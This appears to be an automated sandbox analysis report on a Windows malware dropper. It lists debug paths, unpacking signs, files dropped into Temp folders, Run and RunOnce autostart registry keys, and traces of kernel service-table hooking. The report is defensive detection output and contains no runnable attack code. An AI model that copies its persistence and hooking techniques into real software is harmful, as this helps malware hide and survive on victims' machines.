            Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: .pdb.dbg source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: symsrv.pdbGCTL source: app.exe, 00000013.00000002.852052823.0000000000B9F000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\wizzlabs\source\repos\Castoura\Castoura\obj\Release\WiccPower.pdb#7 source: 2mqvpn30gyk.exe, 0000000E.00000002.740880867.0000000000262000.00000002.00020000.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\admin\source\repos\EuBuild\obj\Debug\EuBuild.pdb22 source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmp
            Source: Binary string: Z:\Users\wizzlabs\Desktop\Wizzcaster_V2\WizzcasterInstaller\WizzcasterInstaller\obj\Release\Emotissa.pdb source: 2mqvpn30gyk.exe, 0000000E.00000002.820645486.00000000127E2000.00000004.00000001.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\projects\assetstudio\AssetStudio\obj\Release\AssetStudio.pdb source: tpwlxkeo40z.exe
            Source: Binary string: dbghelp.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeUnpacked PE file: 13.2.safebits.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeUnpacked PE file: 19.2.app.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeUnpacked PE file: 1.2.SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.880000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeUnpacked PE file: 2.2.multitimer.exe.470000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeUnpacked PE file: 3.2.multitimer.exe.60000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeUnpacked PE file: 8.2.multitimer.exe.e10000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeUnpacked PE file: 13.2.safebits.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeUnpacked PE file: 19.2.app.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeUnpacked PE file: 19.2.app.exe.400000.0.unpack
            .NET source code contains potential unpackerShow sources
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, u0003u2001.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: multitimer.exe.1.dr, u000fu2003.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.880000.0.unpack, u0003u2001.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe.880000.0.unpack, u0003u2001.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.multitimer.exe.470000.0.unpack, u000fu2003.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.multitimer.exe.470000.0.unpack, u000fu2003.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.multitimer.exe.60000.0.unpack, u000fu2003.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.multitimer.exe.60000.0.unpack, u000fu2003.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2mqvpn30gyk.exe.4.dr, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 4.0.multitimer.exe.a60000.0.unpack, u000fu2003.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 8.0.multitimer.exe.e10000.0.unpack, u000fu2003.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 8.2.multitimer.exe.e10000.0.unpack, u000fu2003.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 11.0.multitimer.exe.560000.0.unpack, u000fu2003.cs.Net Code: \x03 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 89C8W4UQT.exe.14.dr, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: uninstaller.exe.14.dr, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 14.2.2mqvpn30gyk.exe.260000.0.unpack, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 14.0.2mqvpn30gyk.exe.260000.0.unpack, Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Binary contains a suspicious time stampShow sources
            Source: initial sampleStatic PE information: 0xDAF598F1 [Wed May 29 16:36:01 2086 UTC]
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010211D4 LoadLibraryA,GetProcAddress,CloseHandle,17_2_010211D4
            Source: initial sampleStatic PE information: section where entry point is pointing to: .txet
            Source: vkfgkd5pxm1.exe.4.drStatic PE information: section name: .txet
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B57228 push 8B48FFEBh; retf 2_2_00007FFA31B5722D
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B54C72 push es; ret 2_2_00007FFA31B54C74
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeCode function: 2_2_00007FFA31B5A523 push ebp; ret 2_2_00007FFA31B5A524
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004027F2 push 004027E3h; ret 13_2_00402803
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00402935 push eax; mov dword ptr [esp], edx13_2_00402948
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00403A3F push ecx; retf 13_2_00403A42
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004029ED push ecx; mov dword ptr [esp], eax13_2_004029F2
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0046E9E8 push dword ptr [ebp-08h]; ret 13_2_0046EBCF
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00450B04 push 00450B91h; ret 13_2_00450B89
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0045A078 push 0045A177h; ret 13_2_0045A16F
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004C40A0 push ecx; mov dword ptr [esp], ecx13_2_004C40A4
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0045A10C push 0045A177h; ret 13_2_0045A16F
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004B6268 push ecx; mov dword ptr [esp], eax13_2_004B626D
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004962A4 push 004962F0h; ret 13_2_004962E8
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00484500 push ecx; mov dword ptr [esp], edx13_2_00484505
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004845C0 push ecx; mov dword ptr [esp], edx13_2_004845C5
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004765E8 push 0047662Ah; ret 13_2_00476622
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00466614 push 0046666Eh; ret 13_2_00466666
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004966FC push 00496728h; ret 13_2_00496720
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00496734 push 00496760h; ret 13_2_00496758
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0046E790 push 0046E7C3h; ret 13_2_0046E7BB
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004A479C push 004A47C8h; ret 13_2_004A47C0
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004A6844 push 004A6870h; ret 13_2_004A6868
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004A687C push 004A68A8h; ret 13_2_004A68A0
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0046682C push ecx; mov dword ptr [esp], edx13_2_00466831
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004BE8E0 push ecx; mov dword ptr [esp], edx13_2_004BE8E5
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004C0888 push 004C08B4h; ret 13_2_004C08AC
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0047CA2C push 0047CA64h; ret 13_2_0047CA5C
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_0048CADC push ecx; mov dword ptr [esp], edx13_2_0048CAE1
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00450A9C push 00450B02h; ret 13_2_00450AFA
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_004ACC78 push 004ACCA4h; ret 13_2_004ACC9C
            Source: initial sampleStatic PE information: section name: .text entropy: 7.45568156237
            Source: initial sampleStatic PE information: section name: .text entropy: 7.90202589197
            Source: initial sampleStatic PE information: section name: .text entropy: 7.4927406693
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\2vze2wqfnvj\installer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\uo02buchgfk\vpn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeFile created: C:\Users\user\AppData\Local\Temp\is-KTTI2.tmp\installer.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\qhmeucfqke0\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeFile created: C:\Program Files\89C8W4UQTF\uninstaller.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\rohxg00x4ut\vpn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeFile created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\0g3fd4syqs1\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\NoikfEU1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\vvwtlhtocfa\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeFile created: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\lxr1opmnwjh\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeFile created: C:\Program Files\89C8W4UQTF\89C8W4UQT.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\jkyaj5krzjz\safebits.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeFile created: C:\Users\user\AppData\Roaming\pwdfnyi4vax\vksqeekarkn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\4sgbvongjvu\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\s1knrc5gdfb\v4ondyxg3no.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\v2nlk34vhpy\app.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeFile created: C:\Users\user\AppData\Local\Temp\psllnjovj2s\app.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00401272 RtlExitUserThread,OpenMutexA,ExitProcess,13_2_00401272

            Boot Survival:

            barindex
            Creates multiple autostart registry keysShow sources
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IDFcan
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce xbavmnzo2cnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce giyjgogyiys
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\NoikfEU1.exe
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce xbavmnzo2cnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce xbavmnzo2cnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce xbavmnzo2cnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce xbavmnzo2cnJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce giyjgogyiys
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce giyjgogyiys
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce giyjgogyiys
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce giyjgogyiys
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IDFcan
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run IDFcan

            Hooking and other Techniques for Hiding and Protection:

            barindex
            May modify the system service descriptor table (often done to hook functions)Show sources
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010A7057 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_010A7057
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
